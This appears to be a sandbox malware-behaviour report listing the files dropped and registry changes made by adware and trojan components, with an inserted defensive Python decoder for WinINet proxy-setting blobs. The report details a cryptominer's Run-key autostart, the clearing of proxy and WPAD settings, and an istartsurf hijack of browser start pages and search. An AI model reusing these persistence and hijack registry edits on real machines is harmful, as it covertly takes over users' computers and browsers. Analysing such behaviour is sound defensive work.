C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS.part (612 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\icc.dll (212 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\progress-bar.css (506 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\ironsrc_prot[1].png (364 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B3B.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\csshover3.htc (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\Rerarapepe3[1].jpg (800 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button.png (1 bytes)
%Program Files% (x86)\is383871.log (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D99C.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp\sqlite3.dll (643 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\sponsored.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\ie6_main.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Button_Hover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\images\progress-bg-corner.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE.part (381 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005D92E.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\RerarapepeV2_BG4[1].jpg (2178 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\form.bmp.Mask (244 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\ES.locale (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isf_383810.flat (751 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\browse.css (337 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005ED98.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E32D.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Close.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DDEF.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\PT.locale (4 bytes)
C:\Users\"%CurrentUserName%"\Desktop\Continue DESPROTETOR DE LINKS Installation.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\000640C7.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\No_Button[1].png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\15094FED_stp.EXE (6223 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is620310157\2E398934_stp.CIS (5796 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\Progress.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\images\BG.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005E2C0.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0005DD92.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\logo[1].png (200 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Gometem[1].png (922 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\sdk-ui\checkbox.css (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\css\main.css (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\00063B5A.log (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\Sihehihi_31_03_15[1].png (307 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ish383278\locale\EN.locale (3 bytes)
Registry activity
The process ProtectService.exe:3580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Wow6432Node\IHProtect]
"ptid" = "pcm"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
"AutoDetect"
The process ProtectService.exe:3668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
"AutoConfigURL"
"ProxyServer"
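The `SavedLegacySettings` and `DefaultConnectionSettings` values that ProtectService.exe, ProtectWindowsManager.exe, DesProtetor.exe and the `_mb_1.exe` dropper rewrite in this report are WinINet's binary per-connection proxy blob, which the sandbox prints only as its first 16 bytes. The decoder below is an added example, not part of the Lavasoft report or of any of the dropped components; it assumes the blob layout WinINet writes on the Windows 7 host named in the report (version DWORD, change counter DWORD, flags DWORD, then three length-prefixed ANSI strings for proxy server, bypass list and auto-config URL, followed by a zeroed reserved trailer) and reads the flag bits as the `INTERNET_PER_CONN_FLAGS` values. The two hex dumps fed to it are copied from the report; the proxy-enabled blob is constructed here for contrast. Because the report truncates every value at 16 bytes, the decoder must stop cleanly rather than raise when the string fields run out.

```python
import struct

# Flag bits of the third DWORD (the same values WinINet uses for
# INTERNET_PER_CONN_FLAGS).
PROXY_TYPE_DIRECT = 0x01          # connect directly
PROXY_TYPE_PROXY = 0x02           # use the proxy server string
PROXY_TYPE_AUTO_PROXY_URL = 0x04  # use the auto-config (PAC) URL string
PROXY_TYPE_AUTO_DETECT = 0x08     # WPAD auto-detect

STRING_FIELDS = ("proxy_server", "bypass_list", "autoconfig_url")


def parse_hex_dump(dump: str) -> bytes:
    """Turn the report's 'XX XX XX ...' notation into bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


def decode_connection_settings(dump: str) -> dict:
    """Decode a (possibly truncated) DefaultConnectionSettings / SavedLegacySettings value.

    Layout: DWORD version, DWORD change counter, DWORD flags, then three
    length-prefixed ANSI strings: proxy server, bypass list, auto-config URL.
    The sandbox prints only the first 16 bytes, so fields past the first
    string are usually missing; they come back as None with 'truncated' set
    instead of raising.
    """
    buf = parse_hex_dump(dump)
    if len(buf) < 12:
        raise ValueError("blob shorter than the three fixed DWORDs")
    version, counter, flags = struct.unpack_from("<III", buf, 0)
    result = {
        "version": version, "counter": counter, "flags": flags,
        "direct": bool(flags & PROXY_TYPE_DIRECT),
        "proxy": bool(flags & PROXY_TYPE_PROXY),
        "autoconfig": bool(flags & PROXY_TYPE_AUTO_PROXY_URL),
        "autodetect": bool(flags & PROXY_TYPE_AUTO_DETECT),
        "truncated": False,
    }
    result.update({name: None for name in STRING_FIELDS})
    off = 12
    for name in STRING_FIELDS:
        if off + 4 > len(buf):
            result["truncated"] = True
            break
        (length,) = struct.unpack_from("<I", buf, off)
        off += 4
        if off + length > len(buf):
            result["truncated"] = True
            break
        result[name] = buf[off:off + length].decode("latin-1")
        off += length
    return result


def encode_connection_settings(flags, proxy_server="", bypass_list="",
                               autoconfig_url="", counter=1, version=0x46) -> str:
    """Build a complete blob in the report's hex notation, so the decoder can
    also be exercised on an untruncated, proxy-enabled configuration."""
    buf = struct.pack("<III", version, counter, flags)
    for s in (proxy_server, bypass_list, autoconfig_url):
        raw = s.encode("latin-1")
        buf += struct.pack("<I", len(raw)) + raw
    buf += b"\x00" * 32  # reserved zero trailer that follows the strings
    return " ".join(f"{b:02X}" for b in buf)


def summarize(dump: str) -> str:
    """One-line human reading of a value, as an analyst would note it."""
    d = decode_connection_settings(dump)
    modes = [label for label, on in (("direct", d["direct"]), ("proxy", d["proxy"]),
                                     ("pac", d["autoconfig"]), ("auto-detect", d["autodetect"])) if on]
    text = f"v{d['version']} change#{d['counter']} flags=0x{d['flags']:02X} ({', '.join(modes) or 'none'})"
    if d["proxy_server"]:
        text += f" proxy={d['proxy_server']}"
    if d["autoconfig_url"]:
        text += f" pac={d['autoconfig_url']}"
    if d["truncated"]:
        text += " [value truncated in report]"
    return text


if __name__ == "__main__":
    # Values as printed in the report above (first 16 bytes only).
    print(summarize("46 00 00 00 4C 00 00 00 09 00 00 00 00 00 00 00"))  # ProtectService.exe:3580
    print(summarize("46 00 00 00 44 00 00 00 09 00 00 00 00 00 00 00"))  # _mb_1.exe:1884
    # Constructed proxy-enabled blob, for contrast.
    print(summarize(encode_connection_settings(PROXY_TYPE_DIRECT | PROXY_TYPE_PROXY,
                                               "127.0.0.1:8080", "<local>")))
```

Read this way, every blob in the report carries flags 0x09 (direct connection plus WPAD auto-detect) and an empty proxy-server string, which agrees with the `ProxyEnable = 0` and the deleted `ProxyServer`/`AutoConfigURL` values around it: the components are clearing any configured proxy or PAC URL rather than installing one, while the rising change counter (0x44, 0x4C) shows the value being rewritten repeatedly by different processes.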
The process g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "C4 83 39 63 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 44 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process ProtectWindowsManager.exe:3736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 08 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "7D 6C C9 96 9A 83 D0 01"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "A0 85 4E 73 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process ProtectWindowsManager.exe:3316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\services\eventlog\Application\WindowsMangerProtect]
"EventMessageFile" = "C:\ProgramData\WindowsMangerPro￿Â"
"TypesSupported" = "7"
The process 15094FED_stp.EXE:3668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DesProtetor]
"Publisher" = "DesprotetorINC"
"DisplayVersion" = "1.0"
"DisplayName" = "DesProtetor"
[HKLM\SOFTWARE\DesProtetor]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DesProtetor]
"UninstallString" = "%Program Files% (x86)\DesProtetor\uninst.exe"
"Comments" = "Tenha acesso direto aos links sem passar por nenhum protetor de Links ou publicidades" (Portuguese: "Get direct access to links without going through any link protector or advertisements")
"QuietUninstallString" = "%Program Files% (x86)\DesProtetor\uninst.exe"
The process cpuminer-x11opt-setup.exe:3752 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files% (x86)\Google\Update\1.3.25.11, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer]
"InstallLocation" = "C:\Windows\system32"
"DisplayName" = "CPU Miner"
"Publisher" = "Open Source"
"DisplayIcon" = "C:\Windows\system32\cpuminer-gw64.exe"
"EstimatedSize" = "1316"
"DisplayVersion" = "1.1"
To run itself automatically each time Windows boots, the Trojan adds a link to its file under the following system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"cpuminer" = "C:\Windows\system32\cpuminer-gw64.exe"
The process DesProtetor.exe:4032 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 08 00 00 00 09 00 00 00 00 00 00 00"
"DefaultConnectionSettings" = "46 00 00 00 07 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "A0 85 4E 73 9A 83 D0 01"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "13 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "BE 7F E7 6B 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process wpm_v20.0.0.2227.exe:3268 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Wow6432Node\supWindowsMangerProtect]
"ptid" = "pcm"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"DisplayVersion" = "1.2.0"
"DisplayName" = "ActSys"
[HKLM\SOFTWARE\ActSys]
"Version" = "1.2.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"Publisher" = "NINJASOFT LLC"
"QuietUninstallString" = "%Program Files% (x86)\ActSys\remove_ActSys.exe /S"
"UninstallString" = "%Program Files% (x86)\ActSys\remove_ActSys.exe /S"
"Comments" = "Browse safe online with our product! It alerts you if a page is harmful for your computer (Build ID: CWxGaP3QbYgwfMaFKJSDGrZa)"
The process QQBrowser.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process QQBrowser.exe:3212 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Mozilla\Extends]
"AppID" = "[email protected]"
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E\@""%windir%\System32]
"ie4uinit.exe"",-738" = "Start Internet Explorer without ActiveX controls or browser extensions."
[HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"Publisher" = "istartsurf"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command]
"(Default)" = "%Program Files% (x86)\Mozilla Firefox\firefox.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"DisplayName" = "istartsurf"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}]
"URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKLM\SOFTWARE\Wow6432Node\istartsurfSoftware\istartsurfhp]
"oem" = "pcm"
"Time" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F&q={searchTerms}"
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"
[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E\@""%systemroot%\system32\windowspowershell\v1.0]
"powershell.exe"",-111" = "Performs object-based (command-line) functions"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Clients\StartMenuInternet\VMWAREHOSTOPEN.EXE\shell\open\command]
"(Default)" = "%Program Files%\VMware\VMware Tools\VMwareHostOpen.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command]
"(Default)" = "%Program Files% (x86)\Google\Chrome\Application\chrome.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{33BB0A4E-99AF-4226-BDF6-49120163DE86}"
[HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe http://www.istartsurf.com/?type=sc&ts=1430435237&from=pcm&uid=535559167_198339_B48A115F"
